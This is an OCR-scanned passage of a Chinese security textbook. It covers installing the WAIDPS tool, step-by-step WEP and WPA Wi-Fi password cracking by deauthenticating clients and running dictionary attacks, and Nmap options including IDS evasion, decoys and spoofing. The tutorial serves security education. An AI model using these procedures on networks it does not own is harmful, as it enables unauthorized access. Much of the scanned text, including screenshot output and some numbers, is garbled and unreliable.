step 园 下 载 完成 后 按 Enter 键 ， 会 给 出 WAIDPS 系 统 帮 助 信息 ， 如 下 图 所 示 。 
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Creating database files 


4 /waidps.py [options] <args 


完成 后 WAIDPS 会 在 根 目 录 创 
建 .SYWorks 目 录 ，/.SYWorks/WAIDPS 是 主 
目录 ， 其 中 包含 waidsp.py 脚 本 文件 ， 如 下 
图 所 示 。 


aptured Datab 


大 CC 
WAIDPS# ls 


WAII 
rks 
onfig .ini 


Stn.DeAuth.p 


9.5.2 ”启动 WAIDPS 


安装 好 WAIDPS 后 ， 就 可 以 启动 WAIDPS 
了 。 具 体操 作 步 又 如 下 : 


A 
Pr 
HW 
Pr 
PT 
CP 


ER 
扩 

Wm NN 
A 
po a 
a mm 
PP 


ny 
#0 
Po 
和 


4 拓 
Version 1.0, R.6 (Upda 


下 INNEREENS TENRENENSNRNANT 


EC Nange LlS 


Non 
None 


B64:15:13:8 
None / 


oPN / 


图 所 示 。 


step 图 在 扫描 状态 下 ，WAIDPS 会 开启 两 个 终 


step 国 使 用 WAIDPS 之 前 建议 使 用 airmon-ng 
check kill 命 令 ， 关 闭 不 必要 的 进程 ， 如 下 图 
所 示 。 


:~# airmon-ng check kilU 


illing these processes: 


PID Name 
686 wpa supplicant 


step 图 使 用 airmon-ng start wlan0 命 令 ， 
将 无 线 网 卡 设置 成 monitor 模 式 ， 如 下 图 
所 示 。 


step 图 声 换 到 WAIDPS 主 目录 ， 使 用 ./ 
waidps.py -i Wlan0mon 启 动 WAIDPS 系 统 ， 
如 下 图 所 示 。 


ted - 10 Oct 2614) 


HUAWET TECHNOLOGTES co. ,LTD 


如 下 图 所 示 。 


端 窗口 ， 用 于 抓 取 数 据 包 以 及 扫描 AP， 如 下 


第 9 章 “无线 网 络 中 的 虚拟 AP 技术 三 


ss point and station informatior 


nts) [Recommended] 


Points) 


Current Setting 


此 选项 允许 用 户 在 各 种 访问 点 和 站 点 信息 的 查看 类 型 上 切换 显示 。 

OH: 隐藏 访问 点 和 站 点 列表 显示 。 

1/A: 仅 显 示 接 入 点 列表 ， 隐 藏 关 联 客户 机 。 

2/S: 仅 显 示 客 户 机 列表 〈 包 含 关 联 与 不 关联 的 ) 。 

3/B: 在 不 同 区 域 分 别 显示 接 入 点 与 客户 机 列表 。 

4/P: 带 有 探测 请 求 的 高 级 视图 〈 将 相关 的 站 点 与 接 入 点 合并 ) ， 该 选项 也 是 默认 

推荐 的 。 
e 5/O: 没有 探测 请 求 的 高 级 视图 〈 合 并 相关 站 点 和 接 入 点 ) 。 
e 6/C: 显示 接 入 点 信息 的 时 间 条 形 图 。 
e +/D: 显示 与 多 个 接 入 点 相关 联 的 客户 端 ， 此 步骤 帮助 获知 除 目 标 接 入 点 外 ， 是 否 

还 有 其 他 接 入 点 。 

e 7/N: 显示 关联 /连接 警报 ， 默 认 是 开启 状态 。 
e 8/U: 显示 可 疑 活动 列表 警告 ， 默 认 是 开启 状态 。 
e 9/I: 显示 入 侵 检测 /攻击 警报 ， 默 认 是 开启 状态 。 

[Eee 图 在 程序 中 输入 义 可 以 退出 程序 ， 如 下 图 所 示 。 
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Enter your option : ( <default = return> 
Selecte: 


9.6 ”实战 演练 
实战 演练 1 一 一 使 用 WAIDPS 系 统 破解 WEP 密 码 


WAIDPS 入 侵 检测 系统 同样 具有 密码 破解 功能 ， 通 过 它 可 以 检查 网 络 设置 是 否 够 安 
全 。 破 解 WEP 密 码 步 又 如 下 : 
[step 图 进入 WAIDPS 目 录 ， 使 用 ./waidps.py -i wlan0mon 命 令 启 动 WAIDPS 系 统 ， 按 Enter 
键 ， 切 换 到 命令 模式 ， 如 下 图 所 示 。 


[Enter] 


7] 


step 图 按 下 A 键 进入 网 络 审计 页 面 ， 这 里 会 列 出 附近 AP 列表 ， 如 下 图 所 示 。 


3:30:01 [e nin ago] 


5.] key in [hetp] 
[?] select a tar 


step 国 这 里 可 以 通过 目标 MAC 地 址 或 者 序号 来 选择 AP， 因 为 只 有 一 项 所 以 选择 1 即 可 ， 这 
里 会 给 出 建议 攻击 模式 ， 如 下 图 所 示 。 


termina 
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step 图 选择 第 一 项 使 用 WEP 方 式 攻击 ， 这 里 会 给 出 提示 ， 是 否 使 用 虚假 MAC 地 址 ， 如 下 图 
所 示 。 


step 较 直接 按 Enter 键 ，WAIDPS 系 统 会 锁定 AP 并 尝试 使 用 虚假 MAC 地 址 进行 连接 ， 如 下 
图 所 示 。 


TP-LINK TECHNOLOGTES co. ,LTD 


-15 dBm [ 85 


step 园 按 Enter 键 ， 在 出 现 的 其 他 选项 中 ， 选 择 2 中 断 现 有 客户 端的 连接 ， 如 下 图 所 示 。 


1C:FA:68:01:2F:08 


step 回 中 断 连 接 后 ， er 等 待 获取 足够 多 的 IVs， 从 而 
破解 出 密码 ， 并 给 出 相应 的 提示 
实战 演练 2 一 一 使 用 WAIDPS 系 统 破解 WPA 密 码 


使 用 WAIDPS 系 统 破解 WPA 密 码 的 操作 步骤 如 下 : 
step 回 启动 系统 按 Enter 键 切换 到 命令 模式 ， 在 命令 模式 下 选择 A 网 络 ， 如 下 图 所 示 。 


《 turn> ) :A 


step 图 在 扫描 出 的 AP 列表 页 面 中 输入 WPA， 从 AP 列表 中 输入 序号 ， 如 下 图 所 示 。 


Chn Enc Cipher a WPS STN ESSID 


step 图 这 里 建议 攻击 模式 为 WPA， 如 下 图 所 示 。 


黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[ 1C:FA:68:01:2 ]'s MAC OUI belong: 
[ 1C:FA:68:01 ] e Test-691 
WPA2 / CCMP/TKIP / 


Detail From Database 


e note that after target selectio! c curren ) s will be terminated 


ted Attack Mo 


Crack WEP Acc 
Capture WI 
- WPS Brutefo 


[?] Select an option ( 1/2/3/4/9 Default 


step 园 按 Enter 键 开始 通过 字典 进行 密码 破解 ， 如 下 图 所 示 


s ed Interfa 
Selected Monitoring Interface 
Lected Attacking Interfac 
erfa 


WPA Handshake Capturing 
Application will send broadcast deauthentication signal to all clients connected to the 
between client and access point if any clients re found connected to the access point. 


| 


step 图 设置 密码 位 置 ， 在 命令 模式 C 选 项 的 第 9 项 进行 i 


> 


。 这 里 也 有 默认 密 


全 


Filte 
Operatie 


[7] choose an option ( D/R/T/H/B/W/C ) 


step 较 选择 第 9 项 ， 可 以 添加 或 修改 字典 文件 ， 如 下 图 所 示 。 


Dictionary Setting 
This option allow user to add list of dictionary for passwords cracking.. 


] 


- Add dictionary location 

- Set default dictionary 

- Delete dictionary location 
Select an option ( A/S/D ) 
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码 文 件 ， 如 下 


第 9 章 无 线 网 络 中 的 虚拟 AP 技 术 


9.7 小 试 身手 
练习 1: 熟悉 虚拟 AP 技术 ， 懂 得 如 何 防御 虚拟 AP。 


练习 2: 使 用 Windows10 系 统 搭建 虚拟 AP。 
练习 3: 搭建 WAIDPS 无 线 网 络 入 侵 检测 系统 。 
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第 10 草 ”从 无 线 网 络 渗透 内 网 


网 络 通信 是 


基于 TCP/IP 的 四 层 网 络 模型 ， 因 此 在 每 一 层 都 可 以 通过 特定 的 通信 协议 发 


现存 活 主 机 ， 从 而 实现 从 无 线 网 络 渗透 到 内 网 的 操作 。 本 章 介 绍 从 无 线 网 络 渗透 到 内 网 的 


方法 ， 主 要 包括 扫描 工具 Nmap 的 应 用 、 二 层 扫 描 、 


号 10.1 认识 扫描 工具 Nmap 


Nmap 是 一 个 网 络 连接 端 扫 描 软件 ， 
通过 扫描 可 以 确定 哪些 服务 运行 在 哪些 连 
接 端 ， 并 且 推 断 计 算 机 运行 哪个 操作 系 
统 ， 是 网 络 管理 员 常 用 的 扫描 软件 之 一 。 
直接 输入 Nmap 命 令 ， 便 会 打开 Nmap 的 帮 
助 信息 。 


10.1.1 目标 发 现 帮助 信息 


除了 选项 ， 所 有 出 现在 Nmap 命 令 行 上 
的 都 被 视 为 对 目标 主机 的 说 明 ， 最 简单 的 
情况 是 指定 一 个 目标 全 地 址 或 主机 名 。 下 图 
为 目标 发 现 的 帮助 信息 。 


ImRGET SPECIFICATIONT 


ed eto ha Et: 
sft com/24, 282 158.810 ,18 35:72 


参数 说 明 如 下 : 

e -iL <inputfilename>: 将 不 同 的 IP 
地 址 保存 成 文件 ， 用 这 个 参数 导入 
文件 。 

e -iR <num hosts>: 随机 选择 目标 ， 
num hosts 表 示 目 标 数 目 ，0 表 示 扫 
描 不 中 断 。 例 如 : Nmap - 退 100 -p 
135 任 意 选取 100 个 IP 地 址 扫描 135 
端口 。 

® --exclude <hostl [, host2] [, host3], 
.>: 排除 主机 /网 络 ， 例 如 : Nmap 
192.168.1.0/24 --exclude 1-100 去 除 掉 
前 100 个 地 址 ， 从 101 开 始 扫描 。 

e@ --excludefile <exclude file>: 将 需要 


三 层 扫 描 、 四 层 扫 描 等 。 


排除 的 地 址 存放 到 一 个 文件 当中 ， 
用 该 参数 指定 。 


10.1.2 主机 发 现 帮助 信息 


任何 网 络 探测 任务 的 最 初 几 个 步骤 就 
是 把 一 组 IP 范 围 ( 有 时 该 范围 很 大 ) 缩小 为 
一 列 活动 的 或 者 感 兴趣 的 主机 ， 扫 描 每 个 IP 
的 每 个 端口 很 慢 ， 通 常 也 没 必 要 ， 扫 描 什 
么 样 的 主机 主要 依赖 于 扫描 的 目的 。 

发 送 探测 包 到 目标 主机 ， 若 收 到 回 
复 ， 则 说 明 目 标 主机 是 开启 的 ，Nmap 支 持 
约 10 种 不 同 的 主机 探测 方式 ， 默 认 发 送 4 种 
请 求 : 

(1) ICMP echo request。 

(2) a TCP SYN packet to port 443 。 

(3) a TCP ACK packet to port 80。 

(4) an ICMP timestamp request。 

主机 发 现 帮助 信息 ， 如 下 图 所 示 。 


Kip host discovery 
Upp or sce a 
kr es 


参数 说 明 如 下 : 
e -sL: List Scan 列表 扫描 ， 仅 将 指定 
的 目标 卫 列 举 出 来 ， 并 不 进行 扫描 。 


例如 : Namp -sL 192.168.1.0/28。 

e -sn: Ping Scan 只 利用 Ping 扫 描 进 
行 主机 发 现 ， 不 进行 端口 扫描 。 默 
认 情 况 下 发 送 ICMP 回 声 请 求 和 一 
个 TCP 报 文 到 80 端 口 ， 非 特权 用 户 
发 送 一 个 SYN 报 文 到 80 端 口 。 可 以 


和 除 -PO 之 外 的 任何 发 现 探测 类 
型 -P* 选 项 结合 使 用 以 达到 更 高 的 
-Pn: 将 所 有 指定 的 主机 视 作 开启 
的 ， 跳 过 主机 发 现 的 过 程 。 

-PS [portlist]: TCP SYN Ping， 发 
送 一 个 设置 了 SYN 标 志 位 的 空 TCP 
报 文 。 默 认 端口 为 80 〈 可 设置 ) ， 
也 可 指定 端口 。 目 标 主机 端口 关 
闭 ， 回 复 RST， 端 口 开放 ， 则 回 
复 SYN/ACK， 但 都 表明 目标 主机 
在 线 。UNIX 机 器 上 ， 只 有 特权 用 
户 才能 发 送 和 接收 原始 的 TCP 报 
文 ， 因 此 非特 权 用 户 进行 系统 调用 
connect()， 也 发 送 一 个 SYN 报 文 来 
尝试 建立 连接 。 

-PA [portlistl: TCP ACK Ping, 发 
送 一 个 设置 了 ACK 标 志 位 的 TCP 报 
文 。 默 认 端口 为 80 (可 设置 ) ， 也 
可 指定 端口 。 目 标 主机 在 线 ， 回 复 
RST， 不 在 线 则 超时 。UNIX 机 器 
上 ， 只 有 特权 用 户 才 能 发 送 和 接收 
原始 的 TCP 报 文 ， 因 此 非特 权 用 户 
进行 系统 调用 connect()， 也 发 送 一 
个 SYN 报 文 来 尝试 建立 连接 。 

-PU [portlist]: UDP Ping， 发 送 一 
个 空 的 UDP 报 文 到 指定 的 端口 。 默 
认 端 口 为 31338( 可 设置 ) 。 优 势 是 
可 以 穿越 只 过 滤 TCP 的 防火 墙 或 过 
滤器 。 若 端口 关闭 ， 则 回复 ICMP 端 
口 无 法 到 达 ， 说 明 主 机 在 线 ， 其 他 
类 型 的 ICMP 错 误 如 主机 /网 络 无 法 
到 达 或 者 TTL 超 时 则 表示 主机 不 在 
线 ; 没有 回应 也 被 这 样 解释 ， 但 不 
一 定 正确 (因为 大 多 数 开放 该 端口 
的 服务 会 忽略 该 UDP 报 文 ) 。 

-PY [portlist]: 发 送 一 个 SCTP 数 
据 ， 用 于 传输 语音 的 一 个 协议 。 
-PE/-PP/-PM: ICMP Ping Types， 发 
送 ICMP Type 8〈 响 应 请 求 ) 报 文 ， 
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期 待 从 运行 的 主机 得 到 一 个 Type 0 
〈 响 应) 报 文 。 

e -PO: 使 用 IP 协 议 的 Ping 来 进行 
扫描 。 

e。 -n: 不 用 域名 解析 ， 加 快 扫描 速度 。 

e -R: 为 所 有 目标 IP 地 址 做 反 向 域名 
解析 。 

@ --dns-servers<serv| (,serv2) , ..>: 使 
用 指定 的 域名 服务 器 进行 解析 ， 一 
般 不 使 用 该 选项 ， 因 为 比较 慢 。 例 
如 : Nmap --system-dns 8.8.8.8 www. 
baidu.com 不 使 用 系统 指定 的 DNS 服 
务 器 。 

e --system-dns: 使 用 操作 系统 默认 的 
DNS 服务 器 ， 加 与 不 加 一 样 。 

e --traceroute: 路 由 追踪 ， 同 使 用 系统 
自 带 的 traceroute 效 果 类 似 。 例 如 : 
Nmap www.baidu.com --traceroute -p 
80。 下 图 为 执行 效果 。 


Footarali: # nnap Ww.baldu. con --traceroute - 
Starting Nnap 7.76 ( https://nnap.org ) at 2018- 18- 28 67:97 EDT 
Nmap scan report for www.baidu.com (226.181.111.188) 

Host is up (9.954s latency). 

Dther addresses for www.baldu.com (not scanned): 229.181.112.24: 


PoRT ”STATE SERVICE 
Be/tcp open http 


TRACEROUTE (using port 443/tcp) 
HoP RTT ADDRESS 


和 
ha 65.58 ms 229.181.111.188 


Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds 


10.1.3 ”端口 扫描 帮助 信息 


Nmap 这 些 年 来 功能 越 来 越 多 ， 它 也 是 
从 一 个 高 效 的 端口 扫描 器 开始 的 ， 并 且 这 
仍然 是 它 的 核心 功能 。Nmap<targe 人 这 个 简 
单 的 命令 扫描 主机 <target> 上 超过 1660 个 的 
TCP 端 口 。 

许多 传统 的 端口 扫描 器 只 列 出 所 有 端 
口 是 开放 还 是 关闭 的 ，Nmap 的 扫描 信息 量 
更 加 详细 ， 它 把 端口 分 成 六 个 状态 : 

open〔 开 放 的 ) 、closed (关闭 的 )、 
filtered (被 过 滤 的 ) 、unfiltered (未 被 过 滤 
的 ) 、openlfiltered (开放 或 者 被 过 滤 的 ) 
和 closedlfiltered (关闭 或 者 被 过 滤 的 ) 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


1. open 〈 开 放 的 ) 


应 用 程序 正在 该 端口 接收 TCP 连 接 或 者 
UDP 报 文 ， 发 现 这 一 点 常常 是 端口 扫描 的 
主要 目标 。 安 全 意识 强 的 人 都 知道 每 个 开 
放 的 端口 都 有 可 能 是 攻击 的 入 口 。 攻 击 者 
或 者 入 侵 测 试 者 想 要 发 现 开放 的 端口 。 而 
管理 员 则 试图 关闭 它们 或 者 用 防火 墙 保护 
它们 ， 以 免 妨 碍 合法 用 户 ， 非 安全 扫描 可 
能 对 开放 的 端口 也 感 兴趣 ， 因 为 它们 显示 
了 网 络 上 哪些 服务 可 供 使 用 。 


2. closed (关闭 的 ) 


关闭 的 端口 对 于 Nmap 也 是 可 访问 的 
〈 它 接受 Nmap 的 探测 报 文 并 做 出 响应 ) ， 
但 没有 应 用 程序 在 其 上 监听 ， 它 们 可 以 显 
示 该 IP 地 址 上 (主机 发 现 ， 或 者 Ping 扫 描 ) 
的 主机 正在 运行 up 也 对 部 分 操作 系统 探测 
有 所 帮助 。 因 为 关闭 的 端口 是 可 访问 的 ， 
也 许 过 会 儿 值 得 再 扫描 一 下 ， 可 能 一 些 又 
开放 了 。 系 统管 理 员 可 能 会 考虑 用 防火 墙 
封锁 这 样 的 端口 ， 因 此 就 会 被 显示 为 被 过 
滤 的 状态 。 


3. filtered (被 过 滤 的 ) 


由 于 包 过 滤 阻 止 探测 报 文 到 达 端 口 ， 
Nmap 无 法 确定 该 端口 是 否 开放 ， 过 滤 可 能 
来 自 专业 的 防火 墙 设备 、 路 由 器 规则 或 者 
主机 上 的 软件 防火 墙 ， 这样 的 端口 一 般 扫 
描 几 乎 不 提供 任何 信息 。 有 了 时候 它们 响应 
ICMP 错 误 消息 ， 如 类 型 3 代码 13( 无 法 到 
达 目 标 : 通信 被 管理 员 禁 止 ) ， 但 更 普遍 
的 是 过 滤器 只 是 丢弃 探测 帧 ， 不 做 任何 响 
应 。 这 迫使 Nmap 重 试 若干 次 以 防 探测 包 是 
由 于 网 络 阻塞 而 丢弃 的 ， 由 此 使 得 扫描 速 
度 明 显 变 慢 。 


4. unfiltered (未 被 过 滤 的 ) 


未 被 过 滤 状 态 意味 着 端口 可 访问 ， 但 
Nmap 不 能 确定 它 是 开放 还 是 关闭 ， 只 有 用 
于 映射 防火 墙 规则 集 的 ACK 扫 描 才 会 把 端 
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口 分 类 到 这 种 状态 。 用 其 他 类 型 的 扫描 如 
窗口 扫描 、SYN 扫 描 或 者 FIN 扫 描 来 扫描 
未 被 过 滤 的 端口 ， 可 以 帮助 确定 端口 是 否 
开放 。 


5. openlfiltered 〈 开 放 或 者 被 过 滤 的 ) 

当 无 法 确定 端口 是 开放 还 是 被 过 滤 
的 ，Nmap 就 把 该 端口 划分 成 这 种 状态 。 开 
放 的 端口 不 响应 就 是 一 个 例子 。 没 有 响应 
也 可 能 意味 着 报 文 过 滤器 丢弃 了 探测 报 文 
或 者 它 引 发 的 任何 响应 ， 因 此 Nmap 无 法 确 
定 该 端口 是 开放 的 还 是 被 过 滤 的 。 


6. closedlfiltered 〈 关 闭 或 者 被 过 
滤 的 ) 


该 状态 用 于 Nmap 不 能 确定 端口 是 关闭 
的 还 是 被 过 滤 的 ， 它 只 可 能 出 现在 IPID Idle 
扫描 中 。 
端口 扫描 的 帮助 信息 ， 如 下 图 所 示 。 
ECAN TECHNIQUES: 
-SS/ST/SA/SW/SM: TCP SYN/Connect()/ACK/Window/Maimon Scan 
-SU: UDP Scan 
-SN/sF/sX: TCP Null, FIN, and Xmas scans 
--scanflags <flags>: Customize TCP scan flags 
-SI <zombie host[:probeport]>: Idle scan 
“SY/sZ: SCTP INIT/COOKIE-ECHO scans 


-50: IP protocol scan 
-b <FTP relay host>: FTP bounce scan 


参数 说 明 如 下 : 

e -SS: TCP SYN 扫 描 ， 半 开放 扫描 ， 
扫描 速度 快 ， 不易 被 注意 到 不 
完成 TCP 连 接 ) ， 且 能 明确 区 分 
openlclosedlfiltered 。 

e -sST: TCP Connect() 扫 描 ， 建 立 完整 
连接 ， 容 易 被 记录 ， 对 原始 报 文 控 
制 少 ， 效 率 低 但 是 准确 。 

e@ -SA: TCPACK 扫 描 ， 发 送 一 个 ACK 
数据 包 ， 通 过 SYN/ACK 返 回 数据 包 
类 型 判断 防火 墙 规则 。 

e -sW: TCP Window 扫 描 ，TCP 窗 口 
扫描 ， 依 赖 于 互联 网 上 少数 系统 
的 实现 细节 ， 因 此 可 信 度 不 高 ， 
根据 窗口 大 小 来 判断 端口 是 开放 
的 ( 正 数 ) 还 是 关闭 的 (0) 。 


e -sM: TCP Maimon 扫 描 ， 探 测报 文 
是 FIN/ACK， 端 口 开 放 或 关闭 ， 都 
对 这 样 的 报 文 响应 RST 报 文 ， 但 如 
果 端 口 开放 ， 许 多 基于 BSD 的 系统 
只 是 丢弃 该 探测 报 文 。 

e -sU: 使 用 UDP 扫描 ， 对 UDP 服务 
进行 扫描 ， 如 DNS、SNMP、DHCP 
等 。 可 以 和 TCP 扫 描 结 合 使 用 ， 但 
是 效率 低下 ， 开 放 的 和 被 过 滤 的 端 
口 很 少 响 应 。 加 速 UDP 扫描 的 方法 
包括 并 发 扫描 更 多 的 主机 、 先 只 对 
主要 端口 进行 快速 扫描 、 从 防火 墙 
后 面 扫 描 、 使 用 -host-timeout 跳 过 慢 
速 的 主机 。 

® -sN/-sF/-sX: TCP Null, FIN, and 
Xmas 扫 描 ， 从 RFC 挖 掘 的 微妙 方 
法 来 区 分 开放 关闭 端口 ; 除了 探 
测报 文 的 标志 位 不 同 ， 三 种 扫描 
在 行为 上 一 致 。 

e -scanflags<flags>: 通过 指定 任意 
的 TCP 标 志 位 来 设计 扫描 ， 可 以 是 
数字 标记 值 ， 也 可 以 使 用 字符 名 如 
URG、ACK、PSH、RST、SYN、 
FIN。 

® -SI <zombie host[:probeport]>: 中 间 
人 扫描 ， 利 用 中 间 人 主机 上 已 知 IP 
分 段 ID 序列 生成 算法 来 窥探 目标 上 
开放 端口 的 信息 ， 极 端 隐蔽 ， 可 以 
指定 端口 号 ， 否 则 默认 80 端 口 。 

e -sY/sZ: 是 针对 SCTP 协 议 的 扫描 ， 
很 少 使 用 。 

。 -sO: IP 协 议 扫 描 ， 可 以 确定 目标 机 
支持 哪些 IP 协 议 ， 如 TCP、ICMP、 
IGMP 。 

e@ -b <FTP relay host>: FTP 弹 跳 扫 
描 ，FTP 中 继 的 一 个 扫描 。 


10.1.4 “端口 说 明和 扫描 顺序 
这 类 参数 通常 指定 要 扫描 哪些 端口 ， 
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扫描 端口 的 顺序 是 随机 的 还 是 依次 扫描 ， 
还 可 以 指定 扫描 端口 的 协议 类 型 。 
下 图 为 端口 说 明和 扫描 顺序 帮助 信息 。 


FarspEGIF 
-p <port 
Ex 


[TON ANUSCAN URUERT 
0 ii 


cifiei 
,111 
Exc 


参数 说 明 如 下 : 

e -p <port ranges>: 只 扫描 指定 的 端 
口 ， 单 个 端口 和 用 连 字符 表示 的 端 
口 范围 都 可 以 ， 如 果 不 指定 扫描 类 
型 ， 默 认 是 TCP 和 UDP 都 扫描 ， 可 
以 通过 在 端口 号 前 加 上 T: 或 者 U: 指 
定 协议 。 例 如 : 参数 -p U:53，111， 
137，T:21-25，80，139，8080 将 扫 
描 UDP 端口 3，111， 和 137， 同 时 
扫描 列 出 的 TCP 端 口 。 

® --exclude-ports<port ranges>: 用 于 
过 滤 掉 其 中 的 一 段 。 

e -F: 快速 扫描 〈 仅 扫描 100 个 最 常用 
的 端口 ) ，Nmap-services 文 件 指定 
想 要 扫描 的 端口 ， 可 以 用 --datadir 选 
项 指定 自己 的 Nmap-services 文 件 。 

e -I: 默认 情况 下 按 随 机 端口 扫 
描 ， 如 果 加 上 该 参数 ， 则 扫描 按 


照 顺序 执行 。 

e --top-ports<number>: 指定 靠 前 的 端 
口 数 进行 扫描 。 

e --port-ratio<rativ>: 扫描 一 些 更 
常见 的 端口 。 


10.1.5 ”服务 与 版 本 探测 一 一 脚本 扫描 


在 端口 扫描 过 程 中 可 以 判断 该 端口 使 
用 的 是 什么 类 型 的 服务 ， 这 时 使 用 下 面 这 
些 参数 来 设置 探测 服务 规则 ，Nmap 提 供 了 
大 量 的 脚本 ， 通 过 参数 指定 调用 这 些 脚 本 
可 以 更 好 地 完成 扫描 任务 。 

下 图 为 服务 与 版 本 探测 帮助 信息 。 
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SERVICE/VERSIUN DETECTION 
port: 


on info 
to 9 (try all probes) 
ity 2) 


ctivity (for debuqging) | 


参数 说 明 如 下 ， 
e -sSV: 启用 特征 探测 ， 通 过 从 特征 库 
的 比 对 判断 服务 类 型 。 


e --version-intensity <level>: 启用 特 
征 探测 也 并 不 是 将 采集 的 信息 与 特 
征 库 的 所 有 信息 进行 匹配 ， 因 此 使 
用 该 参数 设置 探测 级 别 ， 探 测 级 别 
越 高 匹配 信息 越 多 。 

e --version-light: 设置 扫描 级 别 为 2。 

e --version-all: 设置 扫描 级 别 为 9。 

e --version-trace: 将 扫描 的 结果 进行 
一 次 跟踪 。 

下 图 为 脚本 扫描 的 帮助 信息 。 


CRTPT SCRN 
-SC: equivalent to --script=default 
scriptr<Lua scripts>: <Lua scripts> is a comma separated list of 
directories, script-files or script-categories 
--script-args=<nl=Vl, [nz2: >; provide arguments to scripts 
i bgp ee be a args in a file 


-script-updatedb: Update th 
script-helpseLua seripts>: show Retp about script 
ue scriptsr Is 8 conpa-separated tist of icript-fites or 
script-categories. 


参数 说 明 如 下 : 

e -sC: 指定 一 个 具体 脚本 ，--script 参 
数 的 一 个 简写 。 

e@ --Script<Lua scripts>: 指定 一 个 Lua 
的 脚本 。 

® --script-args=<nl=v1,[n2=v2,...]>: 指 
定 脚本 的 参数 。 

e --script-args-file=filename: 同上 面 类 
似 ， 指 定 一 个 文件 名 作为 参数 。 


e --script-trace: 脚本 扫描 的 一 个 
跟踪 。 
e --script-updatedb: 更 新 脚本 数 
据 库 。 
e --script-help=<Lua scripts>: 提供 脚 
本 的 帮助 信息 。 
10.1.6 ”系统 判断 一 一 时 间 与 性 能 


通过 Nmap 可 以 对 系统 进行 一 个 判断 ， 
另外 在 扫描 过 程 中 如 果 扫 描 过 快 可 能 会 触 
发 一 些 报 警 ， 合 理 的 配置 扫描 时 间 既 可 以 
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获取 更 多 的 信息 ， 还 可 以 使 Nmap 发 挥 出 更 
好 的 性 能 。 
下 图 为 其 帮助 信息 。 


操作 系统 相关 的 参数 说 明 如 下 : 

e -O: 启用 操作 系统 检测 ，-A 可 以 同 
时 启用 操作 系统 检测 和 版 本 检测 。 

e --osscan-limit: 针对 指定 的 目标 进行 
操作 系统 检测 。 

e --osscan-guess: 当 Nmap 无 法 确定 所 
检测 的 操作 系统 时 ， 会 尽 可 能 地 提 
供 最 相近 的 匹配 。 

时 间 及 性 能 相关 的 参数 说 明 如 下 : 

指定 的 时 间 单 位 可 以 是 : ms(millisec- 

onds),s(seconds), m(minutes) 或 者 h(hours)。 

e@ -T<0-5>: 设置 时 间 模 板 ， 分 别 与 数 
字 0 一 5 对 应 ， 前 两 种 模式 用 于 IDS 租 
避 ，Polite 横 式 降低 了 扫描 速度 以 使 
用 更 少 的 带宽 和 目标 主机 资源 。 默 
认 模 式 为 Normal， 因 此 -T3 实 际 上 未 
做 任何 优化 。Aggressive 模 式 假设 用 
户 具有 合适 及 可 靠 的 网 络 从 而 加 速 
扫描 。Insane 模 式 假设 用 户 具 有 特别 
快 的 网 络 或 者 为 获取 更 快速 度 而 牺 
牲 准确 性 。 

e --min-hostgroup/max-hostgroup 
<size>: 调整 并 行 扫描 组 的 大 小 ， 
用 于 保持 组 的 大 小 在 一 个 指定 的 范 
围 之 内 ，Nmap 具 有 并 行 扫描 多 主机 
端口 或 版 本 的 能 力 ，Nmap 将 多 个 
目标 IP 地 址 空间 分 成 组 ， 然 后 在 同 
一 时 间 对 一 个 组 进行 扫描 。 通 常 
大 的 组 更 有 效 。 缺 点 是 只 有 当 整 
个 组 扫描 结束 后 才 会 提供 主机 的 


扫描 结果 。 

e --min-parallelism/max-parallelism 
<numprobes>: 设置 探测 并 行 数 量 。 
® --min-rtt-timeout/max-rtt-timeout/ 
initial-rtt-timeout <time>: 设置 rtt 返 

回 时 间 。 

e@ --max-retries <tries>: 最 大 探测 
数量 。 

e --host-timeout <time>: 目标 主机 超 
时 时 间 ， 超 出 时 间 退 出 扫描 或 跳 过 
该 主机 扫描 。 

® --scan-delay/--max-scan-delay 
<time>: 设置 扫描 的 延 时 时 间 ， 每 
次 探测 的 间隔 时 间 。 例 如 : Nmap 
192.168.1.1 --scan-delay 10s， 每 次 探 
测 间隔 10s 再 进行 。 

e --min-rate <number>: 每 秒 发 包 最 小 
数量 。 

e --max-rate <number>: 每 秒 发 包 最 大 
数量 。 


10.1.7 ”防火 墙 /IDS 躲 避 和 欺骗 


在 网 络 扫描 中 不 可 避免 地 会 接触 到 
防火 墙 等 网 络 设 备 ，Nmap 提 供 了 以 下 躲 
避 机 制 ， 使 用 这 些 参数 设置 相应 的 躲避 
规则 。 

下 图 为 防火 墙 /IDS 躲 避 和 欺骗 帮助 


nt packets 
cified ip options 


r nane>: Spoof your MAC address 
TcP/UDP/SCTP checksum 


参数 说 明 如 下 : 

e -f; --mtu <val>: 将 TCP 头 分 段 在 几 
个 包 中 ， 使 得 包 过 滤器 、 IDS 以 及 
其 他 工具 的 检测 更 加 困难 ，--mtu 指 
定 最 小 MTU 单 元 。 

e@ -D <decoyl,decoy2[,ME],…>: 使 用 
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诱饵 隐蔽 扫描 ， 使 用 逗号 分 隔 每 个 
诱饵 主机 ， 也 可 用 自己 的 真实 卫 作 
为 诱饵 ， 这 时 可 使 用 ME 选项 说 明 。 
如 果 在 第 6 个 位 置 或 更 后 的 位 置 使 
用 ME 选项 ， 一 些 常用 端口 扫描 检 
测 器 〈 如 Solar Designer’s excellent 
scanlogd) 就 不 会 报告 这 个 真实 IP。 
如 果 不 使 用 ME 选项 ，Nmap 将 真实 
也 放 在 一 个 随机 的 位 置 。 

e -S <IP Address>: 源 地 址 欺骗 ， 说 
明 所 需 发 送 包 的 接口 IP 地 址 ， 炊 端 
是 无 法 收 到 回 包 。 

e -e <iface>: 指定 网 卡 接口 。 

e -g/--source-port <portnum>: 指定 的 
源 端 口 。 

e@ --proxies <urll,[url2],…>: 指定 代理 
服务 器 进行 扫描 。 

e@ --data <hex string>: 在 探测 数据 包 中 
加 入 一 些 数据 ， 让 探测 包 看 上 去 更 
像 正常 数据 包 。 这 里 加 入 的 数据 是 


十 六 进 制 数 。 

e --data-string <string>: 加 入 字符 串 到 
数据 字段 。 

e --data-length <num>: 限定 数据 的 
长 度 。 

e --ip-options <options>: 加 入 IP 包 头 
的 options 字 段 信息 。 


e --ttl <val>: 设置 TTL 值 。 

® --spoof-mac <mac address/prefix/ 
vendor name>: MAC 地 址 欺骗 。 

e --badsum: 差错 校 验 ， 使 用 该 参数 
会 发 送 一 些 错误 校 验 的 数据 包 。 


10.1.8 输出 选项 参数 说 明 


扫描 到 的 结果 如 果 数 据 量 比较 大 不 便 
